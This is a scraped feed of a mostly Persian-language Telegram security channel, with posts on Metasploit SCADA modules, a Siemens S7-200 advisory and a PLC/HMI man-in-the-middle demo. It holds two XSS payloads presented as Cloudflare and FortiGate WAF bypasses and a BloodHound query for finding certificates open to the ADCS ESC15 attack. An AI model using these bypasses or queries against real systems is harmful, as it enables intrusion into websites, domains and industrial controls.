P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
P.F.K Security
SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که می‌توانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژول‌ها از ماژول‌های بهره‌برداری و ماژول‌های کمکی (عمدتاً برای recon استفاده می‌شوند) متفاوت هستند.

@pfksecurity
CLOUDFLARE BYPASS xss

PAYLOAD:

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


FortiGate WAF bypass

<details open ontoggle="(()=>alertibrahimxss)()"></details>

#exploit #bypass
@pfkSecurity
BloodHound ADCS ESC15 (EKUwu) cypher query.

از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالب‌های گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده می‌کند.

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

@PfkSecurity
ssa-589181.pdf
34.9 KB
SSA-589181: Denial-Of-Service in SIMATIC S7-200 SMART CPU
Family Devices

@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.

@PfkSecurity